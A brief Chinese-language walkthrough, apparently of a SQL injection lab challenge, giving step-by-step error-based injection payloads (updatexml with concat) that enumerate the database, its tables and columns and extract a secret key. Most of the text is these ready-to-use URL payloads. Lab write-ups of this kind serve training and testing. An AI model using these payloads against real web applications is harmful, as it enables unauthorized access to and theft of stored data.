1.常规方法测试
2.根据错误信息判断闭合方式为")–+,并且为字符型注入
3.查看当前库
?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
4.查看库下的所有表88IVGFZVAY
?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+
5.查看表中的所有数据 sessid,secret_UCFW
?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=' 88IVGFZVAY'),0x7e),1)--+
6.查看secret_UCFW表下的所有内容 k3yriX7FRIUL1KKbfIYuti4c
?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_UCFW) from challenges.88IVGFZVAY),0x7e),1)--+